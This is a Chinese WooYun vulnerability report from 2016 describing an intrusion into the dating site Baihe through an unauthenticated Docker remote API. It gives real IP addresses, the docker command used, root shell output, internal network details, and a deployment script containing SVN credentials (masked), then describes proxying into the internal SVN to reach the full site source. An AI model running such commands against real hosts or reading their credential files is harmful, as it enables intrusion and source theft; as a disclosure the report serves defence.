新姿势之获取百合网全站源码 | wooyun-2016-0210089

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0210089

漏洞标题：

新姿势之获取百合网全站源码

漏洞详情

披露状态：

2016-05-18：细节已通知厂商并且等待厂商处理中
2016-05-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

没错，就是全站代码
不要问我为什么这么6，请看我名字

详细说明：

先申明下没有脱代码，可查日志
docker remote api未授权访问

http://123.206.30.193:2375

当前image

docker  -H tcp://123.206.30.193:2375 images
REPOSITORY                                             TAG                 IMAGE ID            CREATED             VIRTUAL SIZE
mysql                                                  latest              4f81531a4fa7        2 weeks ago         255.6 MB
docker.baihe.com/nginx                                 1.8                 143b72742691        3 weeks ago         263.3 MB
phpfpm                                                 latest              c0a91a09e975        3 weeks ago         636.7 MB
docker.baihe.com/php5                                  latest              c0a91a09e975        3 weeks ago         636.7 MB
<none>                                                 <none>              f2bea71117ab        3 weeks ago         228.9 MB
<none>                                                 <none>              d397074d70d4        4 weeks ago         228.9 MB
<none>                                                 <none>              60e41557d3f3        4 weeks ago         228.9 MB
docker.baihe.com/php5.5                                latest              825eb26bb666        4 weeks ago         1.057 GB
docker.baihe.com/php-fpm                               6                   4ddadfe0897d        5 weeks ago         394.3 MB
<none>                                                 <none>              a79dfa92a739        6 weeks ago         302.1 MB
centos                                                 6                   61bf77ab8841        6 weeks ago         228.9 MB
centos                                                 centos6             61bf77ab8841        6 weeks ago         228.9 MB
docker.baihe.com/baiheredis                            3.0                 0723312bd82e        6 weeks ago         177.5 MB
baihe/redis                                            latest              0723312bd82e        6 weeks ago         177.5 MB
docker.baihe.com/mongo                                 latest              3b43c155fd10        6 weeks ago         309.8 MB
eva/mongo                                              latest              3b43c155fd10        6 weeks ago         309.8 MB
docker.baihe.com/php                                   latest              c6cc8696a7cb        8 weeks ago         452.8 MB
eva/php                                                latest              c6cc8696a7cb        8 weeks ago         452.8 MB
php                                                    5.6-fpm             c6cc8696a7cb        8 weeks ago         452.8 MB
haproxy                                                alpine              a49566cd6d57        8 weeks ago         10.63 MB
docker.baihe.com/mysql                                 latest              6863cdbe438e        9 weeks ago         361.2 MB
docker.baihe.com/baihemysql                            latest              b666e9e882a2        9 weeks ago         324.2 MB
mysql                                                  5.6                 b666e9e882a2        9 weeks ago         324.2 MB
eva/mysql                                              latest              b666e9e882a2        9 weeks ago         324.2 MB
shipyard/shipyard                                      latest              a1d73c89bdfa        9 weeks ago         58.67 MB
million12/haproxy                                      latest              a5b525064e6c        9 weeks ago         292.8 MB
oblank/docker-centos-nginx-php-mongo-redis-memcached   latest              df7de2852d68        9 weeks ago         1.64 GB
million12/haproxy                                      1.6.3-h2            e7bf1090906c        9 weeks ago         292.8 MB
million12/haproxy                                      h2                  5d65cd66aede        9 weeks ago         292.8 MB
front-nginx                                            latest              36b0adefb2f3        9 weeks ago         190.5 MB
daocloud.io/nginx                                      latest              36b0adefb2f3        9 weeks ago         190.5 MB
docker.baihe.com/baihenginx                            latest              36b0adefb2f3        9 weeks ago         190.5 MB
nginx                                                  latest              36b0adefb2f3        9 weeks ago         190.5 MB
docker.baihe.com/nginx                                 latest              36b0adefb2f3        9 weeks ago         190.5 MB
docker.baihe.com/centos                                latest              bb3d629a7cbc        10 weeks ago        196.6 MB
centos                                                 latest              bb3d629a7cbc        10 weeks ago        196.6 MB
docker.baihe.com/redis                                 latest              8d81cd6f6c5e        10 weeks ago        177.5 MB
docker.baihe.com/redis                                 3.0                 8d81cd6f6c5e        10 weeks ago        177.5 MB
eva/redis                                              latest              8d81cd6f6c5e        10 weeks ago        177.5 MB
redis                                                  3.0                 8d81cd6f6c5e        10 weeks ago        177.5 MB
redis                                                  latest              8d81cd6f6c5e        10 weeks ago        177.5 MB
alpine                                                 latest              2a250d324882        10 weeks ago        4.794 MB
rethinkdb                                              latest              fa65be256431        10 weeks ago        181.8 MB
eva/memcache                                           latest              c9df794a0454        10 weeks ago        132.2 MB
memcached                                              1.4                 c9df794a0454        10 weeks ago        132.2 MB
docker.baihe.com/memcache                              latest              c9df794a0454        10 weeks ago        132.2 MB
swarm                                                  latest              fd056ae2da24        11 weeks ago        18.11 MB
debian                                                 wheezy              43d31a5a4c8c        11 weeks ago        84.88 MB
debian                                                 jessie              a582cd499e0f        11 weeks ago        125.1 MB
daocloud.io/daocloud/daocloud-toolset                  latest              b232d6774447        12 weeks ago        150.2 MB
docker.baihe.com/php-fpm                               latest              5b0fca6df07d        3 months ago        365.6 MB
bitnami/php-fpm                                        latest              5b0fca6df07d        3 months ago        365.6 MB
jprjr/centos-php-fpm                                   latest              d9fce68c8983        3 months ago        392 MB
docker.baihe.com/dockerui                              latest              95c8b9dc91e0        3 months ago        6.13 MB
dockerui/dockerui                                      latest              95c8b9dc91e0        3 months ago        6.13 MB
internavenue/centos-nginx                              latest              8329e9f7189d        3 months ago        589 MB
registry                                               latest              07d93e41c370        3 months ago        422.8 MB
jdeathe/centos-ssh                                     centos-6-1.4.1      19c6a20f72e0        4 months ago        253.2 MB
shipyard/docker-proxy                                  latest              68102ad1785d        4 months ago        9.464 MB
shipyard/deploy                                        latest              1f1b0dc17065        8 months ago        6.514 MB
ehazlett/curl                                          latest              fa495a510875        8 months ago        8.727 MB
microbox/etcd                                          latest              d7522ca4c973        9 months ago        17.86 MB
shipyard/rethinkdb                                     latest              01d0c7f830ab        11 months ago       296.2 MB
<none>                                                 <none>              dc2342e12c39        11 months ago       143.8 MB
kriation/centos7                                       latest              0af989cd52ff        15 months ago       223.1 MB
docker.baihe.com/centos7                               latest              0af989cd52ff        15 months ago       223.1 MB

docker.baihe.com 证明为百合网
神奇一键拿docker外层宿主机root
id

[root@VM_15_76_centos ~]# id
uid=0(root) gid=0(root) groups=0(root)

hosts文件也有baihe.com域名

[root@VM_15_76_centos ~]# cat /etc/hosts
127.0.0.1  localhost  localhost.localdomain  VM_15_76_centos
127.0.0.1 images6.baihe.com
127.0.0.1 images.baihe.com
127.0.0.1 static1.baihe.com
127.0.0.1 static3.baihe.com
127.0.0.1 static4.baihe.com
127.0.0.1 static5.baihe.com
127.0.0.1 static6.baihe.com
127.0.0.1 static8.baihe.com
123.206.30.193 docker.baihe.com
123.206.30.193 shipyard.baihe.com

ifconfig 有内网ip 10.141.15.76

[root@VM_15_76_centos ~]# ifconfig
docker0   Link encap:Ethernet  HWaddr 06:60:E6:35:CE:0D
          inet addr:172.17.42.1  Bcast:0.0.0.0  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4965199 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5093629 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:11538564202 (10.7 GiB)  TX bytes:7761907034 (7.2 GiB)
docker_new0 Link encap:Ethernet  HWaddr 42:7A:77:DD:A3:01
          inet addr:192.168.6.1  Bcast:192.168.6.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
eth0      Link encap:Ethernet  HWaddr 52:54:00:76:48:23
          inet addr:10.141.15.76  Bcast:10.141.63.255  Mask:255.255.192.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:95319305 errors:0 dropped:0 overruns:0 frame:0
          TX packets:51909292 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:24742543618 (23.0 GiB)  TX bytes:14247046227 (13.2 GiB)

/home/work目录下文件

[root@VM_15_76_centos ~]# cd /home/work/
[root@VM_15_76_centos work]# ls -lh
total 892M
drwxr-xr-x  4 root root 4.0K Mar 18 15:37 backup
drwxr-xr-x  4 root root 4.0K Mar 25 16:52 baihe
drwxr-xr-x  3 root root 4.0K Mar 17 15:10 data
drwxr-xr-x 23 root root 4.0K Apr 27 17:13 docker_file
drwx------  2 root root  16K Mar 16 17:34 lost+found
-rw-r--r--  1 root root 261M Apr 27 11:07 nginxa.tar
-rw-r--r--  1 root root   49 Mar 24 10:31 nginxregistry.log
-rw-r--r--  1 root root   13 Mar 24 10:30 nginx用户名密码.log
-rw-------  1 root root 133K Mar 29 11:20 nohup.out
-rw-r--r--  1 root root 631M Apr 27 11:18 phpfpm.tar
drwxr-xr-x  3 root root 4.0K Mar 28 14:33 shipyard
-rw-r--r--  1 root root   36 Mar 24 18:34 shipyard.log
drwxr-xr-x  3 root root 4.0K Mar 18 10:37 static

查看root的.bash_history文件，获取到以下信息

/home/work/baihe
/home/work/docker_file/nginx/conf.d
/home/work/docker_file/nginx/nginx.conf

看了代码下发现都是一些静态的html，js，图片等，没有什么有价值的
然后再翻了翻，在/home/work/backup下发现一个sh脚本，看了下是svn自动更新的脚本
里面暴露了svn帐号密码

[root@VM_15_76_centos backup]# cat update.sh
#!/bin/bash
export LANG=zh_CN.UTF-8
echo 'svn update /home/work/backup/static/'
svn update /home/work/backup/static/ --username **@baihe.com --password *** --no-auth-cache
#cp -fr /home/work/backup/static/* /home/work/baihe/static/
echo 'svn update /home/work/backup/fronthtml/'
svn update /home/work/backup/fronthtml/ --username ***@baihe.com --password ***** --no-auth-cache
#cp -fr /home/work/backup/fronthtml/* /home/work/baihe/fronthtml/
rsync -auv --exclude='.svn/' /home/work/backup/ /home/work/baihe/
find /home/work/baihe -name ".svn"  | xargs rm -rf
echo "update success..."
~

进到/home/work/baihe/fronthtml/目录，执行svn info，获取到svn地址

http://211.151.58.8:1722/svn

公网可以访问，但是都是返回 200 OK Service ready.
经过测试只有内网才可以访问
做了个代理，用获取到svn帐号密码，成功访问

可以看到是全站的代码，包括www，ios，android等，并且都可以访问
再给出几张截图证明
android

www

ios

cms

点到为止

漏洞证明：

修复方案：

参考 http://drops.wooyun.org/papers/15892
可否来个礼物？

版权声明：转载请注明来源黑客,绝对是黑客@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-23 14:30

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑客,绝对是黑客@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑客,绝对是黑客@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源黑客,绝对是黑客@乌云